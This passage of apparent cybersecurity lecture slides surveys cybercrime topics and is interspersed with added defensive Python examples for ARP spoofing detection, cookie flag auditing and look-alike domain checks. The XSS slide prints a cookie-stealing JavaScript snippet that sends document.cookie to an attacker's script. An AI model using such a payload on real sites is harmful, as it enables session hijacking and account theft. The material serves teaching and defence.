4. Disinformation and Misinformation: Spreading false or misleading information to confuse or mislead opponents. Example: Fake news campaigns during elections to sway public opinion.
5. Command and Control Warfare (C2W): Targeting decision-making structures to paralyze an enemy's ability to act effectively. Example: Disrupting enemy communication networks.


Surveillance
• Surveillance involves the systematic monitoring of individuals, groups, or
systems to collect information for security, intelligence, or strategic purposes. It
is a key component of intelligence gathering in both military and civilian
contexts.
• Purpose of Surveillance
• Prevent terrorist activities.
• Ensure national security.
• Monitor dissent or political movements.
• Enforce law and order.
• Track and counter cyber crimes.
• Challenges and Ethical Concerns
• Privacy Invasion: Mass surveillance often leads to concerns about individual freedoms and
privacy.
• Data Security: Collected data can be vulnerable to breaches.
• Abuse of Power: Surveillance tools can be misused by authoritarian regimes to suppress
dissent.

Types of Surveillance

• Electronic Surveillance: Monitoring digital communications, including emails, phone calls, and internet activity. Example: Governments using wiretapping to track criminal activities.
• Video Surveillance: Using CCTV cameras or drones to observe physical spaces. Example: Smart cities employing camera networks for public safety.
• Mass Data Collection: Aggregating and analyzing large volumes of data from social media, financial transactions, or location tracking. Example: Social media monitoring during protests.
• Signals Intelligence (SIGINT): Intercepting communications and electronic signals for intelligence purposes. Example: Monitoring enemy radio communications in wartime.
• Human Intelligence (HUMINT): Relying on informants or undercover agents to gather information. Example: Espionage activities.

In modern conflicts, Information Warfare and Surveillance are closely linked. Surveillance provides the intelligence
needed to plan and execute Information Warfare strategies, while Information Warfare creates conditions that justify
enhanced surveillance. Together, they form a feedback loop in which each strengthens the other.


Virtual Crime
• Virtual crime, also known as cybercrime, is illegal
activity that takes place on the internet. Some examples
of virtual crimes include
• Identity theft
• Cyber stalking
• Ransomware
• Phishing
• Malware
• Intellectual property crimes


Online Frauds
• Online fraud refers to fraudulent activities committed through the internet, where criminals use deceptive tactics to steal personal information, money, or access to sensitive data from victims, often through phishing emails, fake websites, or malicious software, with common types including identity theft, credit card fraud, and business email compromise (BEC).
• Online fraud methods:
• Phishing: Sending deceptive emails or messages that appear to be from a trusted source, tricking users into revealing sensitive details like login credentials or credit card numbers.
• Malware: Installing malicious software on a victim's device to steal information or disrupt system functionality.
• Social engineering: Manipulating people into divulging confidential information through psychological tactics.
• Spoofing: Creating fake websites or emails that closely resemble legitimate ones to deceive users.
• Data breaches: Gaining unauthorized access to a database containing sensitive personal data.
• Common targets:
• Online banking accounts
• Credit card details
• Social media accounts
• Personal identification information (PII)

https://www.thehindu.com/data/cyber-fraud-in-banking-transactions-surges-in-fy24-data/
Mapping the global geography of cybercrime with the World Cybercrime Index
https://journals.plos.org/plosone/article?id=10.1371/



Online Frauds: How to protect yourself
• Strong passwords: Use complex, unique
passwords for each online account
• Two-factor authentication (2FA): Enable
extra security layers to verify your identity
during login
• Be cautious with links and attachments:
Don't click on suspicious links or open
attachments from unknown senders
• Regular software updates: Keep your
operating systems and applications updated
with the latest security patches
• Antivirus software: Install reliable antivirus
protection on your devices
• Be aware of scams: Be vigilant about offers
that seem too good to be true
• Report suspicious activity: Contact your
bank or relevant authorities if you suspect
fraudulent activity

Identity Theft and Intellectual Property Theft
• "Identity theft" refers to when someone illegally uses another person's personal information, like their Social Security number or credit card details, to gain financial benefits or commit fraud.
• "Intellectual property theft" involves stealing someone's creative work or inventions, like patents, trademarks, or copyrighted material, without permission.


Common Identity Theft


Identity Theft Case


Intellectual Property Theft


• Common Causes and Culprits of Intellectual Property Theft
• The range of people and parties participating in IP theft is becoming increasingly sophisticated. Some of the most common culprits associated with IP theft include:
• Foreign Adversaries
• Insiders
• Competitors
• Hackers
• Threat Actors
• Rogue Employees

• Types of intellectual property
• Copyrighted materials: Books, art, and software can be protected by copyright by individuals or organizations. Copyrights protect them against use by others without explicit permission.
• Patented material: Inventors secure patents to protect their innovations, typically preventing others from profiting from their unique ideas for 20 years.
• Trademarks: Organizations can get trademark protections for words, phrases, symbols, designs, or any combination thereof that identify and distinguish their brands of products and services.
• Trade secrets: This broad category refers to confidential information that gives organizations some competitive advantage. This could be a production system, a strategy, or even a client list.

How to Prevent Identity Theft and Intellectual Property Theft, and Mitigate Damages
• Maintain limited access controls – Ensure that only authorized personnel can access confidential
information. Use proper cybersecurity protocols, such as multifactor authentication and encryption, to
safeguard sensitive data.
• Perform IP protection audits – Conduct regular audits to identify gaps or vulnerabilities in your IP
protection strategy and ensure they’re addressed to avoid exploitation.
• Register your intellectual property – Apply to have your intellectual property filed and registered
with the relevant authorities and establish legal ownership to prevent others from mimicking your
ideas without permission.
• Secure your networks and devices – Leverage technologies like firewalls, anti-virus software, and
other professional cybersecurity measures to protect your network and devices from data breaches
and cyber-attacks.
• Utilize non-disclosure agreements – Whenever possible, use non-disclosure agreements (NDAs)
as a layer of protection when sharing sensitive and confidential information with employees and
outside parties.
• Monitor your competitors – Keep an eye on your competitors and watch for any suspicious activity
or infringement on your intellectual property, such as knockoff product replicas.
• Conduct regular employee training – Train your employees on the importance of protecting
intellectual property and how to identify common cyber threats, particularly around IP theft.
• Enforce your rights – Exercise legal action against any parties infringing on your IP rights, thereby preventing further damage and deterring other threats from doing the same.

Network Threats
• Worms
• Virus
• Spam
• Adware
• Spyware
• Trojans


Backdoors and Bots


A "backdoor" is a hidden method that allows unauthorized access to a computer system, bypassing normal security measures, while a "bot" is an automated program that can be used for malicious activities like sending spam or launching attacks when controlled by a hacker, often as part of a larger network called a botnet. Essentially, a backdoor provides the entry point for an attacker to gain control of a system, while bots act as the automated tools used to carry out actions once that access is established.

• Key points about backdoors:
• Function: A backdoor is a secret way to access a system without needing the standard login credentials, allowing attackers to steal data, install malware, or manipulate system functions.
• Creation: Backdoors can be intentionally created by developers for legitimate reasons like system maintenance, but are often maliciously implanted by hackers through exploits or during software development.
• Detection Challenges: Backdoors can be difficult to detect as they are designed to be covert, often using complex mechanisms to activate and communicate with the attacker.

• Key points about bots:
• Automation: Bots are software programs that can perform repetitive tasks automatically, mimicking human interaction.
• Malicious Use: When controlled by a hacker, bots can be used to send large volumes of spam emails, launch denial-of-service attacks, or harvest data from websites.
• Botnets: A group of compromised computers controlled by a single entity, forming a "botnet," can be used to execute coordinated attacks with significant power.

Spoofing
Spoofing is a cybercrime where a malicious actor impersonates a trusted
entity to gain access to sensitive information. The goal is to exploit trust
and manipulate victims into taking actions that compromise their security.
• IP Spoofing: IP spoofing is pretending to be someone else. It is a technique used to gain unauthorized access to a computer by using the IP address of a trusted host. To implement this technique, the attacker has to obtain the IP address of the client and inject their own packets, spoofed with the client's IP address, into the TCP session, so as to fool the server into believing that it is communicating with the victim, i.e. the original host.
• Address Resolution Protocol (ARP) spoofing: An attacker links their MAC address to a legitimate network IP address so they can receive data meant for the owner of that IP address.
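
ARP spoofing as described above shows up on the wire as an IP address whose MAC binding changes. The following detection sketch is an added example, not part of the original slides; the observation format, the addresses and the function names are assumptions made for illustration.

```python
from collections import defaultdict

# Constructed sample: (seconds, IP, MAC) as a sensor might record them from
# ARP replies on one LAN segment. All addresses are made up for this example.
OBSERVATIONS = [
    (0,  "192.168.1.1",  "aa:bb:cc:00:00:01"),  # gateway, genuine binding
    (0,  "192.168.1.20", "aa:bb:cc:00:00:20"),
    (5,  "192.168.1.30", "aa:bb:cc:00:00:30"),
    (60, "192.168.1.1",  "AA-BB-CC-00-00-30"),  # gateway IP now claimed by .30's MAC
    (61, "192.168.1.1",  "aa:bb:cc:00:00:30"),  # repeated claim, reported once
    (90, "192.168.1.20", "aa:bb:cc:00:00:20"),  # unchanged binding, no alert
]


def norm_mac(mac):
    """Lower-case a MAC and use ':' separators so both notations compare equal."""
    return mac.strip().lower().replace("-", ":")


def detect_arp_conflicts(observations, known_bindings=None):
    """Report IP-to-MAC bindings that change and MACs that answer for several IPs.

    known_bindings: optional {ip: mac} of trusted entries (for example the
    gateway). Without it, the first MAC seen for an IP becomes the baseline.
    """
    baseline = {ip: norm_mac(m) for ip, m in (known_bindings or {}).items()}
    ips_per_mac = defaultdict(set)
    changed, reported = [], set()

    for ts, ip, mac in sorted(observations):
        mac = norm_mac(mac)
        ips_per_mac[mac].add(ip)
        expected = baseline.setdefault(ip, mac)
        if mac != expected and (ip, mac) not in reported:
            reported.add((ip, mac))
            changed.append((ip, expected, mac, ts))

    # One MAC answering for several IPs is the second symptom of the same attack.
    multi_ip = {m: sorted(ips) for m, ips in ips_per_mac.items() if len(ips) > 1}
    return {"changed": changed, "multi_ip": multi_ip}


if __name__ == "__main__":
    result = detect_arp_conflicts(OBSERVATIONS)
    for ip, expected, seen, ts in result["changed"]:
        print(f"t={ts}s {ip}: expected {expected}, reply came from {seen}")
    for mac, ips in result["multi_ip"].items():
        print(f"{mac} answers for {', '.join(ips)}")
```

A changed binding is not proof of an attack: a replaced network card, a reused DHCP lease or a failover pair sharing one IP produces the same signal, which is why pinning trusted entries such as the gateway through `known_bindings` reduces noise.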


Session Hijacking
• Session hijacking is a cyberattack where an attacker
gains access to a user's online session. This allows the
attacker to impersonate the user and access their data
and actions.
• How it works
• The server assigns a session ID to a user when they log in.
• The attacker steals the session ID, which is usually stored in
cookies, URLs, or hidden form fields.
• The attacker uses the session ID to impersonate the user and
access their data.


Session Hijacking
• Methods used
• Packet sniffing: Intercepting network traffic to capture session IDs
• Cross-site scripting (XSS): Injecting malicious scripts into web pages to steal session IDs
• Malware: Using malware to infect a user's device and extract session information
• Brute force: Trying session IDs until they are successful
• Calculation: Calculating session IDs if they are generated in a non-random manner

• Consequences
• Identity theft, Financial theft, Malware infection, Denial-of-Service (DoS) attacks, and Violations of data protection regulations.

• How to prevent it?
• Use HTTPS and HSTS, Implement strong session management, Enable HTTP-only and secure flags on cookies, Implement multifactor authentication (MFA), and Educate users about the risks of public Wi-Fi.


Session Hijacking
• TCP session hijacking is a security attack on a user session over a
protected network. The most common method of session
hijacking is called IP spoofing, when an attacker uses source-
routed IP packets to insert commands into an active
communication between two nodes on a network and disguise
itself as one of the authenticated users. This type of attack is
possible because authentication typically is only done at the start
of a TCP session.
• Another type of session hijacking is known as a man-in-the-
middle attack, where the attacker, using a sniffer, can observe
the communication between devices and collect the data that is
transmitted.

Session Hijacking
• Different ways of session hijacking:
• Using Packet Sniffers: In the given figure, it can be seen that the attacker captures the victim’s session ID to gain access to the server by using some packet sniffers.

Session Hijacking
• Cross Site Scripting (XSS Attack)
An attacker can also capture the victim’s session ID with an XSS attack that uses JavaScript. If an attacker sends the victim a crafted link containing malicious JavaScript, the JavaScript runs when the victim clicks on the link and carries out the instructions made by the attacker.

<SCRIPT type="text/javascript">
// Builds a URL on the attacker's server that carries the victim's cookies as a query parameter
var adr = '../attacker.php?victim_cookie=' + escape(document.cookie);
</SCRIPT>
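
Two of the defences named in the session hijacking slides can be checked mechanically: the HTTP-only and secure cookie flags, and session IDs that cannot be calculated. The following is an added example, not part of the original slides; the cookie names, sample headers and function names are assumptions made for illustration.

```python
import secrets

# Assumed cookie names that carry a session ID; adjust to the application.
SESSION_COOKIE_NAMES = {"sessionid", "phpsessid", "jsessionid", "sid"}


def new_session_id():
    """Return an unpredictable session ID: 32 bytes from the OS CSPRNG, URL-safe."""
    return secrets.token_urlsafe(32)


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    if not parts:
        return "", "", {}
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()  # attribute names are case-insensitive
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header_value):
    """Return findings for a session cookie; an empty list means no finding."""
    name, _value, attrs = parse_set_cookie(header_value)
    if name.lower() not in SESSION_COOKIE_NAMES:
        return []  # not a session cookie, out of scope for this check
    findings = []
    if "httponly" not in attrs:
        findings.append("HttpOnly missing: script in the page can read the session ID")
    if "secure" not in attrs:
        findings.append("Secure missing: the session ID can be sent over plain HTTP")
    return findings


def ids_look_sequential(ids):
    """True when a sample of issued IDs parses as integers with one constant step."""
    try:
        nums = [int(i, 16) for i in ids]
    except ValueError:
        return False  # not purely numeric, so not a simple counter
    steps = {b - a for a, b in zip(nums, nums[1:])}
    return len(nums) >= 3 and len(steps) == 1


if __name__ == "__main__":
    # Constructed Set-Cookie values for the demonstration.
    for header in ("sessionid=1001; Path=/",
                   f"sessionid={new_session_id()}; Path=/; HttpOnly; Secure",
                   "theme=dark; Path=/"):
        print(header.split(";")[0], "->", audit_set_cookie(header) or "ok")
    print("sequential sample:", ids_look_sequential(["1001", "1002", "1003"]))
```

With HttpOnly set, a script such as the one on the slide finds no session cookie in `document.cookie`; Secure keeps the cookie off unencrypted connections where a packet sniffer could capture it.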


Sabotage
• Cyber sabotage is the intentional disruption of an organization's
computer systems or data to hinder its operations. It can also
involve damaging an organization's physical infrastructure.
• Examples of cyber sabotage
• Deleting code: Intentionally removing code to prevent an organization from operating
normally
• Infecting a website: Using malware to damage a website's information
• Interfering with computer systems: Altering, erasing, or suppressing computer data or
programs
• Ransomware attacks: Using ransomware to disrupt an organization's operations
• Who commits cyber sabotage?
• Saboteurs: People who intentionally damage an organization's systems or data
• Insiders: Employees who sabotage an organization's systems or data

Phishing
• Phishing is a type of deception designed to steal your valuable personal data, such as credit card numbers, passwords, account data, or other information.
• Types of phishing
• Email phishing: A general term for any malicious email message that tricks users into divulging private information.
• Spear phishing: A targeted phishing attack that uses personalized messaging to trick a specific individual or organization.
• Smishing: A form of phishing that uses fake mobile text messages to trick people into downloading malware.
• Clone phishing: A phishing technique that copies the look, feel, and content of a legitimate message to gain the recipient's confidence.

History of Phishing
• Phreaking + Fishing = Phishing
- Phreaking = making phone calls for free back in the 70’s
- Fishing = Use bait to lure the target
• Phishing in 1995
Target: AOL users
Purpose: getting account passwords for free time
Threat level: low
Techniques: Similar names (www.ao1.com for www.aol.com), social engineering
• Phishing in 2001
Target: Ebayers and major banks
Purpose: getting credit card numbers, accounts
Threat level: medium
Techniques: Same as in 1995, keylogger
• Phishing in 2007
Target: Paypal, banks, ebay
Purpose: bank accounts
Threat level: high
Techniques: browser vulnerabilities, link obfuscation
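
The "similar names" technique in the history above (www.ao1.com for www.aol.com) can be caught by comparing a link's hostname with the domains an organization wants to protect. The following check is an added example, not part of the original slides; the brand list, the substitution map and the function names are assumptions made for illustration.

```python
# Brand domains to protect; these three brands are named on the slide.
BRANDS = ("aol.com", "paypal.com", "ebay.com")

# Constructed, non-exhaustive map of look-alike substitutions.
CONFUSABLES = (("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"), ("vv", "w"), ("rn", "m"))


def skeleton(domain):
    """Fold look-alike characters so 'ao1.com' and 'aol.com' compare equal."""
    s = domain.lower()
    for fake, real in CONFUSABLES:
        s = s.replace(fake, real)
    return s


def registrable(host):
    """Last two labels of a hostname. Assumption: enough for .com-style names;
    production code should consult the Public Suffix List instead."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def edit_distance(a, b):
    """Levenshtein distance: single-character inserts, deletes and substitutions."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(host, brands=BRANDS):
    """Return (verdict, brand) for a hostname taken from a link."""
    host = host.lower().rstrip(".")
    domain = registrable(host)
    if domain in brands:
        return ("legitimate", domain)
    for brand in brands:
        # Same skeleton, or one typo away from a protected domain.
        if skeleton(domain) == skeleton(brand) or edit_distance(domain, brand) == 1:
            return ("lookalike", brand)
    for brand in brands:
        # Brand appears as whole labels, but the registrable domain is someone else's.
        if f".{brand}." in f".{host}.":
            return ("brand-in-subdomain", brand)
    return ("unrelated", None)


if __name__ == "__main__":
    # Constructed hostnames for the demonstration.
    for h in ("www.aol.com", "www.ao1.com", "paypa1.com",
              "ebay.com.account-verify.example.net", "example.org"):
        print(f"{h:40} {classify(h)}")
```

The one-edit rule produces false positives for short, unrelated domains, so a hit is a reason to look closer, not a verdict.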


Phishing
• How phishing works
• Attackers masquerade as a reputable entity or person
• Attackers use personalized messaging, especially emails, to trick victims
• Attackers often use threats or a sense of urgency
• Attackers often use unusual requests

• How to protect yourself from phishing
• Be skeptical of emails that threaten negative consequences
• Be wary of unusual requests


Zombie/Zombie Drone
• A "zombie" or "zombie drone" refers to a compromised computer that has been infected with
malware, allowing a hacker to remotely control it and use it to perform malicious actions without
the owner's knowledge, essentially turning it into a mindless "drone" carrying out the hacker's
commands, often as part of a larger botnet.

• Key points about zombie computers:


• Functionality: Once infected, a zombie computer can be used for various malicious activities like
sending spam emails, launching Distributed Denial-of-Service (DDoS) attacks, spreading further malware,
and more, all under the control of the attacker.
• Botnet connection: A group of zombie computers working together under a single attacker is called a
botnet, where the hacker can command the entire network of compromised devices simultaneously.
• How they become zombies: Computers can become zombies through various methods like phishing
emails, unpatched vulnerabilities, weak passwords, or drive-by downloads that install malicious software.
• The "zombie" analogy: The term "zombie" is used because, like a reanimated corpse in horror movies,
the infected computer is essentially under the control of another entity and has no will of its own.


How to protect against zombie attacks?
• Keep software updated: Regularly install security patches and
updates for your operating system and applications to address
known vulnerabilities.
• Strong passwords: Use strong, unique passwords for each
online account.
• Antivirus software: Install reputable antivirus software and
keep it updated to detect and block malware.
• Firewall protection: Enable your firewall to monitor and control
incoming and outgoing network traffic.
• Be cautious with emails: Be wary of suspicious emails,
especially those with links or attachments from unknown senders.
